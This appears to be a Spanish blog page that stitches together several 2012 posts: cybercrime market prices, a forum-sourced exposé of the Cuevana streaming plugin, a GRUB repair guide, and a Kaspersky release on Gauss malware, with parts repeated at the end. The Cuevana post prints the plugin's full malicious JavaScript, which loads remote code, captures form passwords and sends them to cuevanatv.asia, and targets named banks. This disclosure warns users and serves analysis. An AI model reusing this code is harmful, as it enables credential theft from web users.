El cibercrimen es un negocio y sus actores se mueven por el lucro económico. Los altos precios pagados en el mercado negro online han puesto en el blanco del crimen virtual tanto a los smartphones como a los Mac. Los ataques dirigidos se focalizan en función de las posibilidades de obtener un mayor beneficio y, tal y como explica Marco Preuß , analista senior de virus de Kaspersky Lab, “el malware para smartphones está creciendo de forma considerable. Cuando hablamos de malware nos referimos a un tipo de software que tiene como objetivo infiltrarse o dañar una computadora. El término incluye virus, crimeware, gusanos, troyanos, etc.) La plataforma Android es la más atacada con un 60% de troyanos, de los cuales, un 25% utilizan los mensajes de texto para obtener datos”. Por su parte, el mito de la inviolabilidad de los Mac ha quedado desacreditado y en la actualidad encontramos Spyware, antivirus falsos, troyanos y botnets dirigidas a los equipos de la famosa manzana.
Aunque, evidentemente, no existen datos oficiales de los ingresos de estos delincuentes informáticos, las investigaciones de Kaspersky Lab han arrojado interesantes datos sobre cómo transforman los datos robados en dinero contante y sonante. “Los canales de distribución de malware (crimeware, virus, gusanos, troyanos, etc.)son cada vez más eficaces. Se basan en kits ya construidos, por lo que facilita que personas sin conocimientos sobre programación puedan utilizarlos para crear su propio malware”, señala Preuß.
Los principales ingresos destacados por Kaspersky Lab proceden de la venta de datos de tarjetas de crédito (entre 3 y 100 dólares, dependiendo de la calidad de los datos). Asimismo, una red botnet compuesta por 1.000 ordenadores infectados se vende por 5 dólares, mientras que se pueden llegar a ganar 140 dólares por un pack de 5.000. Por último, aunque no menos lucrativo, los kits de malware (crimeware, virus, gusanos, troyanos, etc.)y exploits pueden llegar a costar hasta 1.500 dólares, siempre dependiendo de su calidad.
En el ciberespacio, como en la vida real, detrás de estas acciones delictivas el dinero es el principal motor de los ladrones.
Toda la entrada es una recopilación de un post de Forocoches, abierto por el usuariosrednalF, le agradecemos a él y a todos los demás usuarios de Forocoches que han ayudado ( y lo siguen haciendo ) para descubrir qué hay detrás de todo este lío. Esta entrada se irá actualizando con la información, datos y demás que se vayan averiguando poco a poco.
NOTICIA REDACTADA por el usuario RME de Forocoches:
Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.
Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.
En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.
Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana
———————————-
“Todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:
http://i50.tinypic.com/6z7byr.png
http://i47.tinypic.com/15n0wpj.png”
———————————-
actualización : post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe.
———————————-
Aquí un vídeo de cómo “actúa” el plug-in:
actualización : confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.
———————————–
ACTUALIZACIÓN IMPORTANTE:
Confirmado que el plugin oficial tiene phising
Pruebas:
Descomprimir xpi con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO INSTALEIS)
Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”.
La url maliciosa es hxxp://cuevanatv.asia/back3.js
———————————-
IMPORTANTE: En el post #294 hay una RECOPILACIÓN de todo el MALWARE del plug-in.
———————————-
MUY IMPORTANTE:
Para todo aquel que sepa de programación/código y demás, aquí el código malicioso, gracias al usuario muertet de Forocoches:
ESTÁ ESCONDIDO EN EL script-compiler.js del plugin de firefox. En forma de eval. Si se hace el unpack podemos encontrar las peticiones citadas.
var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);
El script malicioso:
var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);
El scripts.txt: var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }
A parte de keylogger, está especializado en robar cuentas de esos bancos.
———————————-
AVISO! Actualización a las 19:25
Cuevanatv.asia parece ser que ha caido, o ha sido el host o ellos mismos.
El nuevo plugin (diferente pero con la misma version para que no se sospeche ) YA NO ROBA DATOS. En el tamper Data ya no da el aviso que daba antes. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.
———————————-
19:57
Confirmado, solo cambia la linea 232 del fichero script-compiler.js
Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de forocoches se puede encontrar el ficheo original con el código malicioso, como prueba.
———————————-
IMPORTANTE: Aclarar que GalactiCow no culpa directamente a CUEVANA, ya que pueden haber infectado el plug-in terceros, simplemente difundimos la información. Desde GalactiCow aconsejamos borrar el plug-in y cambiar todas las contraseñas y/o nombres de usuarios posibles.
Aquí el link al post de FOROCOCHES con toda la información, datos, comentarios, etc:
Me pasó al instalar Windows 7 nuevamente en el netbook, que ahora vuela, que Windows eliminó el GRUB.
Probé lo dicho en varios foros pero al final, resultó con esto:
Recomiendo copiar (Control-C), abrir Terminal desde el menú de Ubuntu y pegar los comandos con Shift-Ctrl-V para no equivocarse.
1) Bootear con Live-USB o LIVE-CD y probar Ubuntu sin cambios en el equipo.
Escribir el comando en el Terminal:
sudo fdisk -l
Escribe tu contraseña de administrador y observa el contenido de la pantalla. Ubica en la columna SYSTEM donde diga Linux (Linux sólo) y copia el número después de SDA (en mi caso fue 6)
En el ejemplo que te proponemos a continuación supone que la partición raíz de Ubuntu (/) se encuentra en la segunda partición lógica (/dev/sda6). Modifica los comandos que te proponemos sustituyendo sda6 por la partición concreta en tu caso.
2) Monta el disco duro que contiene tu partición GNU/Linux. En mi caso:
sudo mount -t ext4 /dev/sda6 /mnt
La opción -t indica el tipo de partición, en este caso ext4, seguido por la partición a montar (cambia por la que te corresponda exactamente) y el directorio donde lo vas a montar /media/mnt
En mi caso, salté al paso 4)
3) ¡Atención! En aquellos equipos que se ha realizado la instalación de Ubuntu, en una partición /boot separada de las demás, la partición correspondiente debería también ser montada en /mnt/boot. Es decir, el comando a escribir en la consola o terminal sería (no fue mi caso)
sudo mount -t ext4 /dev/sda6 /mnt/boot
4) Monta también a continuación el resto de los dispositivos en el directorio /mnt en el sistema Live:
sudo mount –bind /dev /mnt/dev (dos guiones antes de bind)
sudo mount –bind /dev/pts /mnt/dev/pts
sudo mount –bind /proc /mnt/proc
sudo mount –bind /sys /mnt/sys
5) A continuación ejecuta la siguiente orden que permite que puedas acceder como root (superadministrador) al sistema de archivos de tu antiguo Ubuntu
sudo chroot /mnt
6) Actualiza la configuración de GRUB 2
grub-mkconfig -o /boot/grub/grub.cfg
7) Carga ahora el Grub en el MBR ejecutando el siguiente comando, es decir, instala el gestor de arranque al comienzo del primer disco duro /dev/sda
grub-install –recheck /dev/sda
(sustituye sda por el disco duro que utilizas para arrancar los sistemas operativos. Casi siempre será sda pero ten cuidado, no debes poner el número de partición, sólo sda)
En mi caso, salté al paso 9)
8) Si el comando anterior no funciona, siempre puedes hacer que Ubuntu se encargue automáticamente de ello (no fue mi caso):
sudo update -grub2
sudo grub-install /dev/sda
9) Sal del entorno chroot para reiniciar el equipo:
exit
sudo reboot
Reinicia el sistema (esta vez sin el Live-CD) y ya podrás ver el menú de arranque GRUB 2, junto con las entradas para Ubuntu 12.04 y Windows.
Sunrise, FL, 9 de agosto de 2012– Kaspersky Lab, líder en el desarrollo de soluciones para el manejo seguro de contenidos y la gestión de amenazas, anuncia el descubrimiento de ‘Gauss’, una nueva amenaza informática que afecta a los usuarios en el Medio Oriente. Gauss es una herramienta de espionaje informático financiada por un estado nacional y diseñada para robar datos sensitivos, en especial contraseñas del navegador de Internet, credenciales de banca en línea, “cookies” y datos específicos de configuración de los equipos infectados.
La función de troyano bancario encontrada en Gauss es una característica única, que nunca antes había sido detectada en las armas informáticas conocidas.
Gauss fue descubierta durante la labor iniciada por la Union Internacional de Telecomunicaciones (ITU, por sus siglas en inglés), después del descubrimiento de Flame. El esfuerzo tiene el objetivo de mitigar los riesgos representados por las armas informáticas, tarea clave en el objetivo global de la paz informática.
ITU, con los conocimientos especializados proporcionados por Kaspersky Lab, está dando pasos importantes para reforzar la seguridad informática global, colaborando con todos los interesados: gobiernos, sector privado, organizaciones internacionales y la sociedad civil, además de sus socios claves de la iniciativa ITU-IMPACT.
Los expertos de Kaspersky Lab descubrieron Gauss al analizar e identificar sus rasgos comunes con Flame. Entre ellos: la plataforma similar de arquitectura, la estructura modular, las bases del código fuente y los métodos de comunicación con los servidores de administración.
Datos básicos:
- El análisis indica que Gauss empezó a operar en septiembre de 2011.
- Se descubrió en junio de 2012 gracias a los conocimientos adquiridos durante el análisis e investigación profundos del programa malicioso Flame.
- Este descubrimiento fue posible gracias a las estrechas similitudes y correlaciones entre Flame y Gauss.
- La infraestructura de los servidores de administración de Gauss se desactivó en julio de 2012, poco después de su descubrimiento. En este momento el programa malicioso está en un estado de letargo, esperando que sus servidores de administración se pongan en funcionamiento.
- Desde finales de mayo de 2012 el sistema de seguridad “en la nube” de Kaspersky Lab registró más de 2.500 infecciones, pero el número total de víctimas de Gauss asciende a decenas de miles. Este número es menor al de Stuxnet, pero es mucho mayor que el número de ataques de Flame y Duqu.
- Gauss roba información detallada sobre los PC infectados, que incluye la historia del navegador, las “cookies”, contraseñas y configuraciones del sistema. También es capaz de robar las credenciales de acceso a varios sistemas de banca y de pago online.
- El análisis de Gauss muestra que fue diseñado para robar datos de varios bancos libaneses, entre ellos Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank y Credit Libanais. También afecta a los usuarios de Citibank y PayPal.
Los expertos de Kaspersky Lab descubrieron el nuevo programa malicioso en junio de 2012. Los desconocidos creadores bautizaron el módulo principal con el nombre del matemático alemán Johann Carl Friedrich Gauss. Los demás componentes también llevan nombres de matemáticos famosos, como Joseph-Louis Lagrange y Kurt Gödel. La investigación reveló que los primeros incidentes provocados por Gauss datan de principios de septiembre de 2011. En julio de 2012 los servidores de administración de Gauss dejaron de funcionar.
Los múltiples módulos de Gauss tienen el propósito de recolectar información de los navegadores, entre ella la historia de las páginas web visitadas y las contraseñas usadas. También envían a los atacantes datos detallados de los equipos infectados, incluyendo información específica de las interfaces de red, los discos de la computadora e información del BIOS. El módulo de Gauss también puede robar datos de los clientes de varios bancos libaneses, entre ellos Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank y Credit Libanais. También tiene como blanco a los usuarios de Citibank y PayPal.
Otra característica clave de Gauss es la habilidad de infectar memorias USB aprovechando la misma vulnerabilidad LNK que usaron Stuxnet y Flame. El proceso de infectar memorias USB es más inteligente. Gauss puede “desinfectar” la memoria bajo ciertas circunstancias y la usa para guardar la información recolectada en un fichero oculto. Otra actividad del troyano es instalar una especie de fuente especial llamada Palida Narrow, pero todavía se desconoce con qué propósito.
A pesar de que el diseño de Gauss es similar al de Flame, la geografía de infección es notablemente diferente. El mayor número de computadoras afectadas por Flame se registró en Irán, mientras que la mayoría de las víctimas de Gauss está localizada en Líbano. También es diferente el número de infecciones. Según la telemetría reportada por Kaspersky Security Network (KSN), Gauss ha infectado unos 2.500 equipos. En comparación, los equipos infectados por Flame fueron menos de 700.
A pesar de que todavía se desconoce el método exacto usado para infectar los equipos, está claro que Gauss se propaga de una forma diferente a la de Flame o Duqu. Sin embargo, al igual que estas dos armas de espionaje informático, los mecanismos de propagación de Gauss funcionan bajo cierto control, lo que realza la naturaleza camuflada y secreta de la operación.
Alexander Gostev, Jefe de Expertos en Seguridad de Kaspersky Lab, comenta: “Las grandes similitudes de Gauss con Flame, como su diseño y el código base, nos han permitido descubrir este programa malicioso. Al igual que Flame y Duqu, Gauss es un complejo conjunto de herramientas de espionaje informático, con un diseño que hace hincapié en camuflarse y pasar desapercibido, pero su objetivo es diferente. Gauss apunta a múltiples usuarios en países seleccionados y roba grandes cantidades de información, sobre todo bancaria y financiera”.
En la actualidad, los productos de Kaspersky Lab detectan, neutralizan y curan las consecuencias de los ataques del troyano Gauss y lo clasifican como Spy.Win32.Gauss.
Los expertos de la compañía han publicado un análisis en profundidad del malware en Securelist.com: http://www.securelist.com/en/analysis/204792238/Gauss_Abnormal_Distribution
El cibercrimen es un negocio y sus actores se mueven por el lucro económico. Los altos precios pagados en el mercado negro online han puesto en el blanco del crimen virtual tanto a los smartphones como a los Mac. Los ataques dirigidos se focalizan en función de las posibilidades de obtener un mayor beneficio y, tal y como explica Marco Preuß , analista senior de virus de Kaspersky Lab, “el malware para smartphones está creciendo de forma considerable. Cuando hablamos de malware nos referimos a un tipo de software que tiene como objetivo infiltrarse o dañar una computadora. El término incluye virus, crimeware, gusanos, troyanos, etc.) La plataforma Android es la más atacada con un 60% de troyanos, de los cuales, un 25% utilizan los mensajes de texto para obtener datos”. Por su parte, el mito de la inviolabilidad de los Mac ha quedado desacreditado y en la actualidad encontramos Spyware, antivirus falsos, troyanos y botnets dirigidas a los equipos de la famosa manzana. 
Toda la entrada es una recopilación de un post de Forocoches, abierto por el usuariosrednalF, le agradecemos a él y a todos los demás usuarios de Forocoches que han ayudado ( y lo siguen haciendo ) para descubrir qué hay detrás de todo este lío. Esta entrada se irá actualizando con la información, datos y demás que se vayan averiguando poco a poco.
Me pasó al instalar Windows 7 nuevamente en el netbook, que ahora vuela, que Windows eliminó el GRUB.
Sunrise, FL, 9 de agosto de 2012– Kaspersky Lab, líder en el desarrollo de soluciones para el manejo seguro de contenidos y la gestión de amenazas, anuncia el descubrimiento de ‘Gauss’, una nueva amenaza informática que afecta a los usuarios en el Medio Oriente. Gauss es una herramienta de espionaje informático financiada por un estado nacional y diseñada para robar datos sensitivos, en especial contraseñas del navegador de Internet, credenciales de banca en línea, “cookies” y datos específicos de configuración de los equipos infectados.
Follow @hackeruna
